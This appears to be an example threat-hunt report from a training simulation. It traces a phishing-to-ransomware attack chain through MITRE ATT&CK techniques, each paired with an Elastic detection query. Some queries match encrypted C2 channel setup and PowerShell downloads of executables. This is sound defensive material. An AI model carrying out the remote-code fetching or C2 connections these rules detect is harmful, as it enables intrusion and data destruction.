#9 LAVAEL: Report
Based on the simulation scenario, a report will be created at the end of the process to summarize the Cyber Hunt Plan.
Cyber Hunt Report Example
Malicious Activity Model:
T1566.001 Phishing: Spearphishing Attachment — An adversary group used spearphishing attachments to gain initial access to the target organization’s network by tricking users into opening malicious files.
Summary:
The original hypothesis was that the adversary conducted research on the company to gather details about certain employees’ interests. Based on this information, the adversary chose to use phishing as an initial access technique, targeting the victim’s interest in cryptocurrency to increase the likelihood of engagement.
Artifacts:
Data Source Used:
Sysmon Event ID 11 File Create
Analytics Used:
FROM logs-* metadata _id, _version, _index
| WHERE (event.code == "11")
AND process.name == "chrome.exe"
AND (file.name LIKE "*.zip:Zone.Identifier"
OR file.name LIKE "*.7z:Zone.Identifier"
OR file.name LIKE "*.rar:Zone.Identifier"
OR file.name LIKE "*.tar:Zone.Identifier"
OR file.name LIKE "*.gz:Zone.Identifier"
OR file.name LIKE "*.bz2:Zone.Identifier"
OR file.name LIKE "*.iso:Zone.Identifier"
OR file.name LIKE "*.exe:Zone.Identifier")
| KEEP @timestamp, event.code, process.entity_id, process.pid, process.name, file.name, file.hash.md5, file.hash.sha1, file.hash.sha256, _id, _version, _indexRule triggered:
Suspicious Archive or Executable Download via Chrome
Malicious Activity Model:
T1560.001 Archive via Utility — The user unzips the downloaded file, extracting its contents, which may involve the use of utilities to unpack the archive.
Summary:
After the user opened the email and downloaded the attachment, the built-in archive utilities were used to extract the contents of the file. This action involved unpacking the archive, potentially exposing malicious content hidden within.
Artifacts:
Data Source Used:
Sysmon Event ID 11 File Create
Analytics Used:
FROM logs-* metadata _id, _version, _index
| WHERE event.code == "15"
AND process.name == "Explorer.EXE"
AND (file.name LIKE "*.exe:Zone.Identifier")
AND (
winlog.event_data.Contents LIKE "*.zip*" OR
winlog.event_data.Contents LIKE "*.7z*" OR
winlog.event_data.Contents LIKE "*.rar*" OR
winlog.event_data.Contents LIKE "*.tar*" OR
winlog.event_data.Contents LIKE "*.gz*" OR
winlog.event_data.Contents LIKE "*.bz2*" OR
winlog.event_data.Contents LIKE "*.iso*"
)
| KEEP event.code, @timestamp, process.name, file.name, file.hash.md5, file.hash.sha1, file.hash.sha256, _id, _version, _indexRule triggered:
Suspicious Archive Execution via Windows Explorer
Malicious Activity Model:
T1204.002 User Execution: Malicious File — The user then executes the .exe file extracted from the zip, resulting in the execution of malicious code.
Summary:
The user extracted the file, which was an executable. The program’s name was crafted to entice the user to run it, resulting in the execution of malicious code.
Artifacts:
Data Source Used:
Sysmon Event ID 1 Process Create
Analytics Used:
FROM logs-* metadata _id, _version, _index
| WHERE (event.code == "1")
AND (
process.name LIKE "*.exe"
AND (
process.name LIKE "*wallet*"
OR process.name LIKE "*bitcoin*"
)
)
AND process.parent.name == "explorer.exe"
| KEEP event.code, @timestamp, process.entity_id, process.pid, process.name, file.hash.md5, file.hash.sha1, file.hash.sha256, _id, _version, _indexRule triggered:
Suspicious Executable Launched via Windows Explorer
Malicious Activity Model:
T1573 Encrypted Channel — After execution, the malware establishes a command and control (C2) channel using encrypted communication to securely communicate with the adversary.
Summary:
The program executed by the user prompted for a password to “unlock the wallet.” In reality, this was a tactic to delay the user while they attempted to guess the password. Meanwhile, PowerShell code embedded in the program executed, establishing a secure, encrypted connection to the C2 server.
Artifacts:
Data Source Used:
Powershell logs
Analytics Used:
FROM logs-* metadata _id, _version, _index
| WHERE (event.category == "process" AND event.action == "start")
AND (
process.command_line LIKE "*System.Net.Security.SslStream*"
AND process.command_line LIKE "*AuthenticateAsClient*"
AND process.command_line LIKE "*GetBytes*"
)
| KEEP event.code, @timestamp, process.entity_id, process.pid, process.name, process.command_line, _id, _version, _indexRule triggered:
Suspicious Encrypted C2 Channel Establishment
Malicious Activity Model:
T1059.001 Command and Scripting Interpreter: PowerShell — The adversary uses PowerShell to download additional malware from a remote server.
Summary:
After the malicious actor gained control, they found some interesting data and used PowerShell to download additional malicious programs, disguising them as wallet updates.
Artifacts:
Data Source Used:
Powershell logs
Analytics Used:
FROM logs-* metadata _id, _version, _index
| WHERE event.code == "4104"
AND (
powershell.file.script_block_text LIKE "*Invoke-WebRequest*"
AND powershell.file.script_block_text LIKE "*http*"
AND (
powershell.file.script_block_text LIKE "*.exe*"
OR powershell.file.script_block_text LIKE "*.py*"
OR powershell.file.script_block_text LIKE "*.ps1*"
)
)
| KEEP event.code, @timestamp, process.entity_id, process.pid, process.name, powershell.file.script_block_text, _id, _version, _indexRule triggered:
Suspicious PowerShell Web Request Execution
Malicious Activity Model:
T1486 Data Encrypted for Impact — The downloaded malware encrypts data in a specified folder to impact the organization.
Summary:
The attacker found some interesting data and used the previously downloaded program to encrypt the data, aiming to impact the organization.
Artifacts:
Data Source Used:
Elastic Agent EDR integration
Analytics Used:
FROM logs-*
| WHERE event.action == "FileCreate"
AND process.executable LIKE "*.exe"
AND file.name LIKE "*.enc"
| STATS unique_files = COUNT_DISTINCT(file.name) BY process.executable
| WHERE unique_files > 5
| SORT unique_files DESC
| RENAME unique_files AS `Files`, process.executable AS `Process Executable`
| KEEP `Process Executable`, `Files`Rule triggered:
Potential Ransomware Activity: Multiple Encrypted Files Created
